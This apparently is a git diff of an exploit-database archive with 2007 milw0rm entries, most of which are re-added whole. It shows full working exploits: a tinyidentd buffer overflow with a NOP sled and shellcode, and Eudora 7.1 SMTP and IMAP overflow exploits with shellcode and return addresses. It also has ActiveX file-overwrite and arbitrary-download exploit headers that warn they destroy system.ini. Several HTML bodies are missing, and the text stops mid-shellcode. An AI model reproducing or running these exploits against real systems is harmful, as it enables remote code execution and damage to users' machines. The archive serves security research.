-nopsize=523-len(payload)-len(shellcode)
-nopsled=''
-for i in range(nopsize):
-    nopsled+='\x90'
-
-payload=payload.replace('XXXX',nopsled+shellcode)
-
-try:
-    target=sys.argv[1]
-    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
-    s.connect((target,113))
-    s.send(payload+'\n')
-    s.close()
-    print 'done'
-except:
-    print 'usage : %s [target]'%sys.argv[0]
-
-# milw0rm.com [2007-05-14]
+#
+#tinyidentd exploit code by
+#thomas . pollet _at_ gmail . com
+#bug by Maarten Boone
+#
+#usage: python exploit.py [target]
+#
+import socket,sys
+#jmp into nop sled
+payload  = '\xeb\x20'  
+#ident crap
+payload += ', 28 : USERID : UNIX : '
+#nop sled
+payload +='XXXX'
+# jmp *%esi
+payload += '\x77\x13\x83\x7c'  #XP kernel32.dll
+#payload += '\xb1\x63\xd9\x77' #W2K rpcrt4.dll
+#metasploit alphanumeric shellcode calc.exe
+shellcode = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49"
+shellcode += "\x49\x49\x48\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x44"
+shellcode += "\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x54\x42\x32\x41\x42\x32\x42"
+shellcode += "\x41\x30\x42\x41\x58\x41\x50\x38\x41\x42\x75\x4a\x49\x69\x6c\x4b"
+shellcode += "\x58\x51\x54\x65\x50\x57\x70\x45\x50\x4e\x6b\x67\x35\x35\x6c\x4e"
+shellcode += "\x6b\x73\x4c\x55\x55\x71\x68\x67\x71\x68\x6f\x6c\x4b\x52\x6f\x46"
+shellcode += "\x78\x4e\x6b\x51\x4f\x71\x30\x74\x41\x7a\x4b\x30\x49\x6c\x4b\x54"
+shellcode += "\x74\x6e\x6b\x76\x61\x4a\x4e\x35\x61\x4b\x70\x6a\x39\x4c\x6c\x4d"
+shellcode += "\x54\x6b\x70\x30\x74\x54\x47\x6a\x61\x6a\x6a\x64\x4d\x63\x31\x79"
+shellcode += "\x52\x4a\x4b\x69\x64\x67\x4b\x32\x74\x65\x74\x66\x64\x31\x65\x4a"
+shellcode += "\x45\x6c\x4b\x71\x4f\x31\x34\x57\x71\x48\x6b\x52\x46\x6e\x6b\x64"
+shellcode += "\x4c\x52\x6b\x4e\x6b\x31\x4f\x77\x6c\x54\x41\x68\x6b\x4c\x4b\x57"
+shellcode += "\x6c\x6c\x4b\x57\x71\x4a\x4b\x4e\x69\x41\x4c\x65\x74\x67\x74\x4a"
+shellcode += "\x63\x75\x61\x4f\x30\x51\x74\x6c\x4b\x61\x50\x50\x30\x4f\x75\x4f"
+shellcode += "\x30\x32\x58\x64\x4c\x4c\x4b\x71\x50\x54\x4c\x4c\x4b\x70\x70\x57"
+shellcode += "\x6c\x4e\x4d\x6e\x6b\x73\x58\x35\x58\x4a\x4b\x36\x69\x6c\x4b\x4d"
+shellcode += "\x50\x4c\x70\x67\x70\x75\x50\x37\x70\x4c\x4b\x45\x38\x35\x6c\x41"
+shellcode += "\x4f\x57\x41\x68\x76\x53\x50\x30\x56\x6e\x69\x6b\x48\x6f\x73\x6f"
+shellcode += "\x30\x63\x4b\x62\x70\x30\x68\x58\x70\x6f\x7a\x57\x74\x51\x4f\x45"
+shellcode += "\x38\x6f\x68\x59\x6e\x4f\x7a\x66\x6e\x62\x77\x69\x6f\x38\x67\x73"
+shellcode += "\x53\x52\x41\x30\x6c\x71\x73\x64\x6e\x35\x35\x30\x78\x70\x65\x45"
+shellcode += "\x50\x44"
+
+nopsize=523-len(payload)-len(shellcode)
+nopsled=''
+for i in range(nopsize):
+    nopsled+='\x90'
+
+payload=payload.replace('XXXX',nopsled+shellcode)
+
+try:
+    target=sys.argv[1]
+    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+    s.connect((target,113))
+    s.send(payload+'\n')
+    s.close()
+    print 'done'
+except:
+    print 'usage : %s [target]'%sys.argv[0]
+
+# milw0rm.com [2007-05-14]
diff --git a/platforms/windows/remote/3927.html b/platforms/windows/remote/3927.html
index 7f326e985..0a2bacd93 100755
--- a/platforms/windows/remote/3927.html
+++ b/platforms/windows/remote/3927.html
@@ -1,45 +1,45 @@
-
    -
    2007/05/15
    
------------------------------------------------------------------------------------
- DB Software Laboratory DeWizardX (DEWizardAX.ocx) Remote Arbitrary File Overwrite
- url: http://www.dbsoftlab.com
- price: $100
-
- author: shinnai
- mail: shinnai[at]autistici[dot]org
- site: http://shinnai.altervista.org
- 
- This was written for educational purpose. Use it at your own risk.
- Author will be not be responsible for any damage.
- 
- THE EXPLOIT WILL OWERWRITE THE system.ini FILE SO BE SURE TO MAKE A COPY OF
- IT BEFORE RUN THIS EXPLOIT OR YOUR PC WILL NOT RESTART!
-
- Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
- all software that use this ocx are vulnerable to these exploits.
------------------------------------------------------------------------------------
-
-
-
-
-
-
-
-
    
-
-# milw0rm.com [2007-05-15]
+
    +
    2007/05/15
    
+-----------------------------------------------------------------------------------
+ DB Software Laboratory DeWizardX (DEWizardAX.ocx) Remote Arbitrary File Overwrite
+ url: http://www.dbsoftlab.com
+ price: $100
+
+ author: shinnai
+ mail: shinnai[at]autistici[dot]org
+ site: http://shinnai.altervista.org
+ 
+ This was written for educational purpose. Use it at your own risk.
+ Author will be not be responsible for any damage.
+ 
+ THE EXPLOIT WILL OWERWRITE THE system.ini FILE SO BE SURE TO MAKE A COPY OF
+ IT BEFORE RUN THIS EXPLOIT OR YOUR PC WILL NOT RESTART!
+
+ Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
+ all software that use this ocx are vulnerable to these exploits.
+-----------------------------------------------------------------------------------
+
+
+
+
+
+
+
+
    
+
+# milw0rm.com [2007-05-15]
diff --git a/platforms/windows/remote/3934.py b/platforms/windows/remote/3934.py
index f261c4010..2abd5c966 100755
--- a/platforms/windows/remote/3934.py
+++ b/platforms/windows/remote/3934.py
@@ -1,56 +1,56 @@
-#!/usr/bin/python
-# Eudora 7.1 SMTP Response 0day Remote Buffer Overflow PoC Exploit
-# Bug discovered by Krystian Kloskowski (h07) 
-# Tested on Eudora 7.1.0.9 / XP SP2 Polish
-# Shellcode type: Windows Execute Command (calc.exe)
-# Note:..
-# This vulnerability can be exploited only if user
-# will ignore warning about "buffer overflow" error.
-##
-
-from struct import pack
-from time import sleep
-from socket import *
-
-bind_addr = '0.0.0.0'
-bind_port = 25
-
-shellcode = (
-"\x31\xc9\x83\xe9\xdb\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xd8"
-"\x22\x72\xe4\x83\xeb\xfc\xe2\xf4\x24\xca\x34\xe4\xd8\x22\xf9\xa1"
-"\xe4\xa9\x0e\xe1\xa0\x23\x9d\x6f\x97\x3a\xf9\xbb\xf8\x23\x99\x07"
-"\xf6\x6b\xf9\xd0\x53\x23\x9c\xd5\x18\xbb\xde\x60\x18\x56\x75\x25"
-"\x12\x2f\x73\x26\x33\xd6\x49\xb0\xfc\x26\x07\x07\x53\x7d\x56\xe5"
-"\x33\x44\xf9\xe8\x93\xa9\x2d\xf8\xd9\xc9\xf9\xf8\x53\x23\x99\x6d"
-"\x84\x06\x76\x27\xe9\xe2\x16\x6f\x98\x12\xf7\x24\xa0\x2d\xf9\xa4"
-"\xd4\xa9\x02\xf8\x75\xa9\x1a\xec\x31\x29\x72\xe4\xd8\xa9\x32\xd0"
-"\xdd\x5e\x72\xe4\xd8\xa9\x1a\xd8\x87\x13\x84\x84\x8e\xc9\x7f\x8c"
-"\x28\xa8\x76\xbb\xb0\xba\x8c\x6e\xd6\x75\x8d\x03\x30\xcc\x8d\x1b"
-"\x27\x41\x13\x88\xbb\x0c\x17\x9c\xbd\x22\x72\xe4")
-
-opcode = 0x7CA58265 # JMP ESP (SHELL32.DLL / XP SP2 Polish)
-
-buf = "250-"
-buf += "A" * 76
-buf += pack("
+# Tested on Eudora 7.1.0.9 / XP SP2 Polish
+# Shellcode type: Windows Execute Command (calc.exe)
+# Note:..
+# This vulnerability can be exploited only if user
+# will ignore warning about "buffer overflow" error.
+##
+
+from struct import pack
+from time import sleep
+from socket import *
+
+bind_addr = '0.0.0.0'
+bind_port = 25
+
+shellcode = (
+"\x31\xc9\x83\xe9\xdb\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xd8"
+"\x22\x72\xe4\x83\xeb\xfc\xe2\xf4\x24\xca\x34\xe4\xd8\x22\xf9\xa1"
+"\xe4\xa9\x0e\xe1\xa0\x23\x9d\x6f\x97\x3a\xf9\xbb\xf8\x23\x99\x07"
+"\xf6\x6b\xf9\xd0\x53\x23\x9c\xd5\x18\xbb\xde\x60\x18\x56\x75\x25"
+"\x12\x2f\x73\x26\x33\xd6\x49\xb0\xfc\x26\x07\x07\x53\x7d\x56\xe5"
+"\x33\x44\xf9\xe8\x93\xa9\x2d\xf8\xd9\xc9\xf9\xf8\x53\x23\x99\x6d"
+"\x84\x06\x76\x27\xe9\xe2\x16\x6f\x98\x12\xf7\x24\xa0\x2d\xf9\xa4"
+"\xd4\xa9\x02\xf8\x75\xa9\x1a\xec\x31\x29\x72\xe4\xd8\xa9\x32\xd0"
+"\xdd\x5e\x72\xe4\xd8\xa9\x1a\xd8\x87\x13\x84\x84\x8e\xc9\x7f\x8c"
+"\x28\xa8\x76\xbb\xb0\xba\x8c\x6e\xd6\x75\x8d\x03\x30\xcc\x8d\x1b"
+"\x27\x41\x13\x88\xbb\x0c\x17\x9c\xbd\x22\x72\xe4")
+
+opcode = 0x7CA58265 # JMP ESP (SHELL32.DLL / XP SP2 Polish)
+
+buf = "250-"
+buf += "A" * 76
+buf += pack("
-
    2007/05/16
    
------------------------------------------------------------------------------------------------------
- IE 6 PrecisionID Barcode ActiveX 1.9 0day (PrecisionID_Barcode.dll) Remote Arbitrary File Overwrite
- url: http://www.precisionid.com/
-
- author: shinnai
- mail: shinnai[at]autistici[dot]org
- site: http://shinnai.altervista.org
- 
- This was written for educational purpose. Use it at your own risk.
- Author will be not be responsible for any damage.
- 
- THE EXPLOIT WILL OWERWRITE THE system.ini FILE SO BE SURE TO MAKE A COPY OF
- IT BEFORE RUN THIS EXPLOIT OR YOUR PC WILL NOT RESTART!
-
- Tested on Windows XP Professional SP2 all patched, with Internet Explorer 6
- all software that use this ocx are vulnerable to these exploits.
-
- If you try this exploit with IE 7, it just stops to answer
------------------------------------------------------------------------------------------------------
-
-
-
-
-
-
-
-
-
-# milw0rm.com [2007-05-16]
+
    +
    2007/05/16
    
+-----------------------------------------------------------------------------------------------------
+ IE 6 PrecisionID Barcode ActiveX 1.9 0day (PrecisionID_Barcode.dll) Remote Arbitrary File Overwrite
+ url: http://www.precisionid.com/
+
+ author: shinnai
+ mail: shinnai[at]autistici[dot]org
+ site: http://shinnai.altervista.org
+ 
+ This was written for educational purpose. Use it at your own risk.
+ Author will be not be responsible for any damage.
+ 
+ THE EXPLOIT WILL OWERWRITE THE system.ini FILE SO BE SURE TO MAKE A COPY OF
+ IT BEFORE RUN THIS EXPLOIT OR YOUR PC WILL NOT RESTART!
+
+ Tested on Windows XP Professional SP2 all patched, with Internet Explorer 6
+ all software that use this ocx are vulnerable to these exploits.
+
+ If you try this exploit with IE 7, it just stops to answer
+-----------------------------------------------------------------------------------------------------
+
+
+
+
+
+
+
+
    
+
+# milw0rm.com [2007-05-16]
diff --git a/platforms/windows/remote/3950.html b/platforms/windows/remote/3950.html
index 24264d8e2..a25ad1dbf 100755
--- a/platforms/windows/remote/3950.html
+++ b/platforms/windows/remote/3950.html
@@ -1,61 +1,61 @@
- 
    2007/05/18
    
-
    ------------------------------------------------------------------------------------------------
- LeadTools JPEG 2000 COM Objejct (LTJ2K14.ocx v. 14.5.0.35) Remote Stack-Based Buffer Overflow
- url: http://www.leadtools.com/
- peice: eheheh, take a look at thier site :)
- 
- author: shinnai
- mail: shinnai[at]autistici[dot]org
- site: http://shinnai.altervista.org
-
- Tested on Windows XP Professional SP2 full patched with Internet Explorer 7
-
- This exploits just open calc.exe
------------------------------------------------------------------------------------------------
-
-
-
-
-
-
-
-
    
-
-# milw0rm.com [2007-05-18]
+ 
    2007/05/18
    
+
    +-----------------------------------------------------------------------------------------------
+ LeadTools JPEG 2000 COM Objejct (LTJ2K14.ocx v. 14.5.0.35) Remote Stack-Based Buffer Overflow
+ url: http://www.leadtools.com/
+ peice: eheheh, take a look at thier site :)
+ 
+ author: shinnai
+ mail: shinnai[at]autistici[dot]org
+ site: http://shinnai.altervista.org
+
+ Tested on Windows XP Professional SP2 full patched with Internet Explorer 7
+
+ This exploits just open calc.exe
+-----------------------------------------------------------------------------------------------
+
+
+
+
+
+
+
+
    
+
+# milw0rm.com [2007-05-18]
diff --git a/platforms/windows/remote/3951.html b/platforms/windows/remote/3951.html
index 401d60b44..f39246605 100755
--- a/platforms/windows/remote/3951.html
+++ b/platforms/windows/remote/3951.html
@@ -1,64 +1,64 @@
-
    2007/05/19
    
-
    -----------------------------------------------------------------------------------------------------
- LeadTools Thumbnail Browser Control (lttmb14E.ocx v. 14.5.0.44) Remote Stack-Based Buffer Overflow
- url: http://www.leadtools.com/
- peice: eheheh, take a look at thier site :)
- 
- author: shinnai
- mail: shinnai[at]autistici[dot]org
- site: http://shinnai.altervista.org
-
- Tested on Windows XP Professional SP2 full patched with Internet Explorer 7
-
- This exploits just open calc.exe
-----------------------------------------------------------------------------------------------------
-
-
-
-
-
-
-
-
-
    
-
-# milw0rm.com [2007-05-18]
+
    2007/05/19
    
+
    +----------------------------------------------------------------------------------------------------
+ LeadTools Thumbnail Browser Control (lttmb14E.ocx v. 14.5.0.44) Remote Stack-Based Buffer Overflow
+ url: http://www.leadtools.com/
+ peice: eheheh, take a look at thier site :)
+ 
+ author: shinnai
+ mail: shinnai[at]autistici[dot]org
+ site: http://shinnai.altervista.org
+
+ Tested on Windows XP Professional SP2 full patched with Internet Explorer 7
+
+ This exploits just open calc.exe
+----------------------------------------------------------------------------------------------------
+
+
+
+
+
+
+
+
+
    
+
+# milw0rm.com [2007-05-18]
diff --git a/platforms/windows/remote/3952.html b/platforms/windows/remote/3952.html
index a8c993c7b..70232d8f9 100755
--- a/platforms/windows/remote/3952.html
+++ b/platforms/windows/remote/3952.html
@@ -1,64 +1,64 @@
-
    2007/05/20
    
-
    -----------------------------------------------------------------------------------------------------------
- LeadTools Raster Thumbnail Object Library (LTRTM14e.DLL v. 14.5.0.44) Remote Stack-Based Buffer Overflow
- url: http://www.leadtools.com/
- peice: eheheh, take a look at thier site :)
- 
- author: shinnai
- mail: shinnai[at]autistici[dot]org
- site: http://shinnai.altervista.org
-
- Tested on Windows XP Professional SP2 full patched with Internet Explorer 7
-
- This exploits just open calc.exe
-----------------------------------------------------------------------------------------------------------
-
-
-
-
-
-
-
-
-
    
-
-# milw0rm.com [2007-05-18]
+
    2007/05/20
    
+
    +----------------------------------------------------------------------------------------------------------
+ LeadTools Raster Thumbnail Object Library (LTRTM14e.DLL v. 14.5.0.44) Remote Stack-Based Buffer Overflow
+ url: http://www.leadtools.com/
+ peice: eheheh, take a look at thier site :)
+ 
+ author: shinnai
+ mail: shinnai[at]autistici[dot]org
+ site: http://shinnai.altervista.org
+
+ Tested on Windows XP Professional SP2 full patched with Internet Explorer 7
+
+ This exploits just open calc.exe
+----------------------------------------------------------------------------------------------------------
+
+
+
+
+
+
+
+
+
    
+
+# milw0rm.com [2007-05-18]
diff --git a/platforms/windows/remote/3961.html b/platforms/windows/remote/3961.html
index 7033d2537..efdd148a9 100755
--- a/platforms/windows/remote/3961.html
+++ b/platforms/windows/remote/3961.html
@@ -1,45 +1,45 @@
-
    -
    2007/05/21
    
------------------------------------------------------------------------------------------------------
- LeadTools Raster Variant Object Library (LTRVR14e.dll v. 14.5.0.44) Remote Arbitrary File Overwrite
- url: http://www.leadtools.com/
- price: eheheh, take a look at thier site :)
-
- author: shinnai
- mail: shinnai[at]autistici[dot]org
- site: http://shinnai.altervista.org
- 
- This was written for educational purpose. Use it at your own risk.
- Author will be not be responsible for any damage.
- 
- THE EXPLOIT WILL OWERWRITE THE system.ini FILE SO BE SURE TO MAKE A COPY OF
- IT BEFORE RUN THIS EXPLOIT OR YOUR PC WILL NOT RESTART!
-
- Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
- all software that use this ocx are vulnerable to this exploits.
------------------------------------------------------------------------------------------------------
-
-
-
-
-
-
-
-
    
-
-# milw0rm.com [2007-05-21]
+
    +
    2007/05/21
    
+-----------------------------------------------------------------------------------------------------
+ LeadTools Raster Variant Object Library (LTRVR14e.dll v. 14.5.0.44) Remote Arbitrary File Overwrite
+ url: http://www.leadtools.com/
+ price: eheheh, take a look at thier site :)
+
+ author: shinnai
+ mail: shinnai[at]autistici[dot]org
+ site: http://shinnai.altervista.org
+ 
+ This was written for educational purpose. Use it at your own risk.
+ Author will be not be responsible for any damage.
+ 
+ THE EXPLOIT WILL OWERWRITE THE system.ini FILE SO BE SURE TO MAKE A COPY OF
+ IT BEFORE RUN THIS EXPLOIT OR YOUR PC WILL NOT RESTART!
+
+ Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
+ all software that use this ocx are vulnerable to this exploits.
+-----------------------------------------------------------------------------------------------------
+
+
+
+
+
+
+
+
    
+
+# milw0rm.com [2007-05-21]
diff --git a/platforms/windows/remote/3966.php b/platforms/windows/remote/3966.php
index a4653e9d8..66d1ee00c 100755
--- a/platforms/windows/remote/3966.php
+++ b/platforms/windows/remote/3966.php
@@ -1,60 +1,60 @@
-
-
-
-";
-?>
-
-
-
-# milw0rm.com [2007-05-21]
+
+
+
+";
+?>
+
+
+
+# milw0rm.com [2007-05-21]
diff --git a/platforms/windows/remote/3967.html b/platforms/windows/remote/3967.html
index fb772b13d..cfee6fdbb 100755
--- a/platforms/windows/remote/3967.html
+++ b/platforms/windows/remote/3967.html
@@ -1,22 +1,22 @@
-
-
-
-
-
-
-# milw0rm.com [2007-05-21]
+
+
+
+
+
+
+# milw0rm.com [2007-05-21]
diff --git a/platforms/windows/remote/3968.html b/platforms/windows/remote/3968.html
index 93e896dfa..6939aeb9b 100755
--- a/platforms/windows/remote/3968.html
+++ b/platforms/windows/remote/3968.html
@@ -1,108 +1,108 @@
-
-
-
-
- www.ksign.com - KSignSWAT SWAT_Login() PoC code 
-
-
-
-
-
-
-
-
-
-# milw0rm.com [2007-05-22]
+
+
+
+
+ www.ksign.com - KSignSWAT SWAT_Login() PoC code 
+
+
+
+
+
+
+
+
+
+# milw0rm.com [2007-05-22]
diff --git a/platforms/windows/remote/3982.html b/platforms/windows/remote/3982.html
index 291b94d77..d5b760444 100755
--- a/platforms/windows/remote/3982.html
+++ b/platforms/windows/remote/3982.html
@@ -1,36 +1,36 @@
-
-
-
-
-
-
-# milw0rm.com [2007-05-24]
+
+
+
+
+
+
+# milw0rm.com [2007-05-24]
diff --git a/platforms/windows/remote/4008.html b/platforms/windows/remote/4008.html
index e0ed58405..8dfcbf2b6 100755
--- a/platforms/windows/remote/4008.html
+++ b/platforms/windows/remote/4008.html
@@ -1,32 +1,32 @@
-
    -
    2007/05/30
    
--------------------------------------------------------------------------------------------
- Zenturi ProgramChecker ActiveX (sasatl.dll) Arbitrary file download/overwrite Exploit
- url: http://www.programchecker.com/activeintro.aspx
-
- author: shinnai
- mail: shinnai[at]autistici[dot]org
- site: http://shinnai.altervista.org
- 
- Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
- all software that use this ocx are vulnerable to this exploits.
-
- Using the "DownloadFile" method, you can download everything you want on a pc. This
- exploit just download a txt file on pc, I try to overwrite cmd.exe and it works.
--------------------------------------------------------------------------------------------
-
-
-
-
-
-
-
-
    
-
-# milw0rm.com [2007-05-30]
+
    +
    2007/05/30
    
+-------------------------------------------------------------------------------------------
+ Zenturi ProgramChecker ActiveX (sasatl.dll) Arbitrary file download/overwrite Exploit
+ url: http://www.programchecker.com/activeintro.aspx
+
+ author: shinnai
+ mail: shinnai[at]autistici[dot]org
+ site: http://shinnai.altervista.org
+ 
+ Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
+ all software that use this ocx are vulnerable to this exploits.
+
+ Using the "DownloadFile" method, you can download everything you want on a pc. This
+ exploit just download a txt file on pc, I try to overwrite cmd.exe and it works.
+-------------------------------------------------------------------------------------------
+
+
+
+
+
+
+
+
    
+
+# milw0rm.com [2007-05-30]
diff --git a/platforms/windows/remote/4010.html b/platforms/windows/remote/4010.html
index 574e8d238..561df6971 100755
--- a/platforms/windows/remote/4010.html
+++ b/platforms/windows/remote/4010.html
@@ -1,49 +1,49 @@
-
    -
    2007/05/28
    
------------------------------------------------------------------------------------------------
- EDraw Office Viewer Component (edrawofficeviewer.ocx v. 4.0.5.20) Unsafe Method Vulnerability
- url: http://www.ocxt.com/officeviewer.php
-
- author: shinnai
- mail: shinnai[at]autistici[dot]org
- site: http://shinnai.altervista.org
- 
- This was written for educational purpose. Use it at your own risk.
- Author will be not be responsible for any damage.
- 
- THE EXPLOIT WILL DELETE THE system.ini FILE SO BE SURE TO MAKE A COPY OF
- IT BEFORE RUN THIS EXPLOIT OR YOUR PC WILL NOT RESTART!
-
- Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
- all software that use this ocx are vulnerable to this exploits.
-
- This ActiveX is marked as:
- RegKey Safe for Script: True
- RegKey Safe for Init: True
- KillBitSet: False
------------------------------------------------------------------------------------------------
-
-
-
-
-
-
-
-
    
-
-# milw0rm.com [2007-05-30]
+
    +
    2007/05/28
    
+-----------------------------------------------------------------------------------------------
+ EDraw Office Viewer Component (edrawofficeviewer.ocx v. 4.0.5.20) Unsafe Method Vulnerability
+ url: http://www.ocxt.com/officeviewer.php
+
+ author: shinnai
+ mail: shinnai[at]autistici[dot]org
+ site: http://shinnai.altervista.org
+ 
+ This was written for educational purpose. Use it at your own risk.
+ Author will be not be responsible for any damage.
+ 
+ THE EXPLOIT WILL DELETE THE system.ini FILE SO BE SURE TO MAKE A COPY OF
+ IT BEFORE RUN THIS EXPLOIT OR YOUR PC WILL NOT RESTART!
+
+ Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
+ all software that use this ocx are vulnerable to this exploits.
+
+ This ActiveX is marked as:
+ RegKey Safe for Script: True
+ RegKey Safe for Init: True
+ KillBitSet: False
+-----------------------------------------------------------------------------------------------
+
+
+
+
+
+
+
+
    
+
+# milw0rm.com [2007-05-30]
diff --git a/platforms/windows/remote/4014.py b/platforms/windows/remote/4014.py
index b0936ec9e..959ee919e 100755
--- a/platforms/windows/remote/4014.py
+++ b/platforms/windows/remote/4014.py
@@ -1,116 +1,116 @@
-#!/usr/bin/python
-# Eudora 7.1 (IMAP FLAGS) 0day Remote SEH Overwrite PoC Exploit
-# Bug discovered by Krystian Kloskowski (h07) 
-# Tested on Eudora 7.1.0.9 / 2k SP4 Polish
-# Shellcode type: Windows Execute Command (calc.exe)
-# Details:..
-# Eudora --> SELECT IMBOX  ---------> IMAP server
-# Eudora <-- FLAGS (\..AAAA...) <---- IMAP server
-# FLAGS (\Answered \Flagged \Draft \Deleted \Seen hasatt + "A" * 1070
-# 0x41414141  Pointer to next SEH record
-# 0x41414141  SE handler
-##
-
-from thread import start_new_thread
-from struct import pack
-from string import find
-from time import sleep
-from socket import *
-
-session_elements = (
-'* OK IMAP4 ready\r\n',
-
-'* CAPABILITY IMAP4 IMAP4rev1 ACL QUOTA LITERAL+ MAILBOX-REFERRALS NAMESPACE UIDP'
-'LUS ID NO_ATOMIC_RENAME UNSELECT CHILDREN MULTIAPPEND BINARY SORT THREAD=ORDERED'
-'SUBJECT THREAD=REFERENCES ANNOTATEMORE IDLE SASL-IR\r\n'
-'00000 OK completed\r\n',
-
-'00001 OK User logged in\r\n',
-
-'* NAMESPACE (("INBOX." ".")) (("user." ".")) (("" "."))\r\n'
-'00002 OK Completed\r\n',
-
-'* LIST (\Noselect) "." ""\r\n'
-'00003 OK Completed (0.000 secs 0 calls)\r\n',
-
-'* LIST (\HasChildren) "." "INBOX"\r\n'
-'00004 OK Completed (0.000 secs 3 calls)\r\n',
-
-'* LIST (\HasChildren) "." "INBOX"\r\n'
-'00005 OK Completed (0.000 secs 3 calls)\r\n',
-
-'* FLAGS (\Answered \Flagged \Draft \Deleted \Seen hasatt%s)\r\n'
-'* OK [PERMANENTFLAGS (\Answered \Flagged \Draft \Deleted \Seen hasatt \*)]\r\n'  
-'* 1 EXISTS\r\n'
-'* 0 RECENT\r\n'
-'* OK [UIDVALIDITY 1180222864]\r\n'  
-'* OK [UIDNEXT 2]\r\n'  
-'* OK [NOMODSEQ] Sorry, modsequences have not been enabled on this mailbox\r\n'
-'* OK [URLMECH INTERNAL]\r\n'
-'00003 OK [READ-WRITE] Completed\r\n')
-
-shellcode = (
-# Restricted Characters: 0x0a, 0x0d, 0x20, 0x29, (0x60 .. 0x7B)
-# EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com    
-"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
-"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
-"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
-"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
-"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44"
-"\x42\x30\x42\x50\x42\x50\x4b\x58\x45\x44\x4e\x33\x4b\x48\x4e\x57"
-"\x45\x50\x4a\x57\x41\x30\x4f\x4e\x4b\x38\x4f\x34\x4a\x31\x4b\x58"
-"\x4f\x35\x42\x32\x41\x50\x4b\x4e\x49\x54\x4b\x38\x46\x43\x4b\x58"
-"\x41\x50\x50\x4e\x41\x53\x42\x4c\x49\x49\x4e\x4a\x46\x58\x42\x4c"
-"\x46\x57\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e"
-"\x46\x4f\x4b\x53\x46\x35\x46\x42\x46\x30\x45\x57\x45\x4e\x4b\x38"
-"\x4f\x45\x46\x52\x41\x50\x4b\x4e\x48\x56\x4b\x48\x4e\x50\x4b\x54"
-"\x4b\x48\x4f\x45\x4e\x51\x41\x30\x4b\x4e\x4b\x58\x4e\x51\x4b\x48"
-"\x41\x50\x4b\x4e\x49\x58\x4e\x55\x46\x52\x46\x50\x43\x4c\x41\x53"
-"\x42\x4c\x46\x56\x4b\x38\x42\x34\x42\x33\x45\x38\x42\x4c\x4a\x47"
-"\x4e\x50\x4b\x38\x42\x44\x4e\x50\x4b\x38\x42\x47\x4e\x41\x4d\x4a"
-"\x4b\x48\x4a\x56\x4a\x30\x4b\x4e\x49\x30\x4b\x48\x42\x48\x42\x4b"
-"\x42\x50\x42\x30\x42\x50\x4b\x38\x4a\x36\x4e\x43\x4f\x35\x41\x43"
-"\x48\x4f\x42\x56\x48\x55\x49\x58\x4a\x4f\x43\x38\x42\x4c\x4b\x57"
-"\x42\x35\x4a\x56\x42\x4f\x4c\x48\x46\x50\x4f\x45\x4a\x56\x4a\x49"
-"\x50\x4f\x4c\x38\x50\x30\x47\x55\x4f\x4f\x47\x4e\x43\x46\x41\x36"
-"\x4e\x36\x43\x36\x42\x50\x5a")
-
-NEXT_SEH_RECORD = 0x909006EB  # JMP SHORT + 0x06
-SE_HANDLER = 0x7CEA41D3       # POP POP RET (SHELL32.DLL / 2k SP4 Polish)
-
-buf = "A" * 1062
-buf += pack("
+# Tested on Eudora 7.1.0.9 / 2k SP4 Polish
+# Shellcode type: Windows Execute Command (calc.exe)
+# Details:..
+# Eudora --> SELECT IMBOX  ---------> IMAP server
+# Eudora <-- FLAGS (\..AAAA...) <---- IMAP server
+# FLAGS (\Answered \Flagged \Draft \Deleted \Seen hasatt + "A" * 1070
+# 0x41414141  Pointer to next SEH record
+# 0x41414141  SE handler
+##
+
+from thread import start_new_thread
+from struct import pack
+from string import find
+from time import sleep
+from socket import *
+
+session_elements = (
+'* OK IMAP4 ready\r\n',
+
+'* CAPABILITY IMAP4 IMAP4rev1 ACL QUOTA LITERAL+ MAILBOX-REFERRALS NAMESPACE UIDP'
+'LUS ID NO_ATOMIC_RENAME UNSELECT CHILDREN MULTIAPPEND BINARY SORT THREAD=ORDERED'
+'SUBJECT THREAD=REFERENCES ANNOTATEMORE IDLE SASL-IR\r\n'
+'00000 OK completed\r\n',
+
+'00001 OK User logged in\r\n',
+
+'* NAMESPACE (("INBOX." ".")) (("user." ".")) (("" "."))\r\n'
+'00002 OK Completed\r\n',
+
+'* LIST (\Noselect) "." ""\r\n'
+'00003 OK Completed (0.000 secs 0 calls)\r\n',
+
+'* LIST (\HasChildren) "." "INBOX"\r\n'
+'00004 OK Completed (0.000 secs 3 calls)\r\n',
+
+'* LIST (\HasChildren) "." "INBOX"\r\n'
+'00005 OK Completed (0.000 secs 3 calls)\r\n',
+
+'* FLAGS (\Answered \Flagged \Draft \Deleted \Seen hasatt%s)\r\n'
+'* OK [PERMANENTFLAGS (\Answered \Flagged \Draft \Deleted \Seen hasatt \*)]\r\n'  
+'* 1 EXISTS\r\n'
+'* 0 RECENT\r\n'
+'* OK [UIDVALIDITY 1180222864]\r\n'  
+'* OK [UIDNEXT 2]\r\n'  
+'* OK [NOMODSEQ] Sorry, modsequences have not been enabled on this mailbox\r\n'
+'* OK [URLMECH INTERNAL]\r\n'
+'00003 OK [READ-WRITE] Completed\r\n')
+
+shellcode = (
+# Restricted Characters: 0x0a, 0x0d, 0x20, 0x29, (0x60 .. 0x7B)
